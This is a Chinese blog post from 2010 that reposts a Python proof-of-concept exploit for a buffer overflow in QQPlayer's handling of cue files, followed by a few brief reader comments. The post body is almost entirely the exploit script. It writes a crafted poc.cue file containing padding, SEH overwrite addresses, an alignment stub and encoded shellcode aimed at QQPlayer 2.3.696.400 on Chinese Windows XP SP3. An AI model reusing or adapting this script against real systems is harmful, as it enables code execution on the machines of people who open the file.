首页 > 编程溢出 > QQPlayer cue 文件缓冲区溢出漏洞

QQPlayer cue 文件缓冲区溢出漏洞

2010年7月27日 spookzang 发表评论 阅读评论

QQPlayer cue 文件缓冲区溢出漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

 
#!/usr/bin/env python
 
#################################################################
#
# Title: QQPlayer cue File Buffer Overflow Exploit
# Author: Lufeng Li of Neusoft Corporation
# Vendor: www.qq.com
# Platform: Windows XPSP3 Chinese Simplified
# Tested: QQPlayer 2.3.696.400
# Vulnerable: QQPlayer<=2.3.696.400p1
#
#################################################################
# Code :
 
head = '''FILE "'''
junk = "A" * 780
nseh ="\x42\x61\x21\x61"
seh  ="\xa9\x9e\x41\x00"
adjust="\x32\x42\x61\x33\xca\x83\xc0\x10"
shellcode=("hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7L0T0V7L2z1l131o2q1k2D1l081o"
           "0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038N5L0c5p8K354q2j8N5O00PYVTX10X41PZ41"
           "H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK"
           "NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01")
junk_="R"*8000
foot ='''.avi" VIDEO'''+"\x0a"'''TRACK 02 MODE1/8888'''+"\x0a"+"INDEX 08 08:08:08"
payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot
 
fobj = open("poc.cue","w")
fobj.write(payload)
fobj.close()
分类: 编程溢出 标签: ,
  1. 好东西分享
    2010年8月5日04:25 | #1
    回复 | 引用

    这漏洞有什么危害吗

  2. laohao
    2010年8月13日14:44 | #2
    回复 | 引用

    QQ Player我不用,不过任何软件漏洞都是很难避免的

  3. 亚明照明
    2010年8月14日08:13 | #3
    回复 | 引用

    写的不错,哈哈,博主文笔不错,做网站多久了?呵呵!!!!

  4. 我心飞翔
    2010年8月17日07:30 | #4
    回复 | 引用

    专业工具测试的吧,你可以给马化腾提提

  1. 本文目前尚无任何 trackbacks 和 pingbacks.